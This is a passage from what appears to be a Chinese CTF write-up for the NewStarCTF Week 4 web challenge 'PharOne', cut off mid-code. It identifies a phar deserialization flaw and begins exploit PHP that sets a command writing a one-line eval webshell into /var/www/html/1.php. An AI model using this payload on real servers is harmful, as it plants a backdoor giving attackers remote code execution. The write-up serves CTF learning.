网站首页
编程语言
数据库
系统相关
其他分享
编程问答
PharOne
2024-08-02
NewStarCTF WEEK4|WEB PharOne
首先进入后查看源码进入class.php看见unlike很明显是一个phar反序列化的利用我们有两种选择一一句话木马<?phpclassFlag{public$cmd;}$a=newFlag();$a->cmd="echo\"<?=@eval(\\\$_POST['a']);\">/var/www/html/1.php";$phar=newPhar("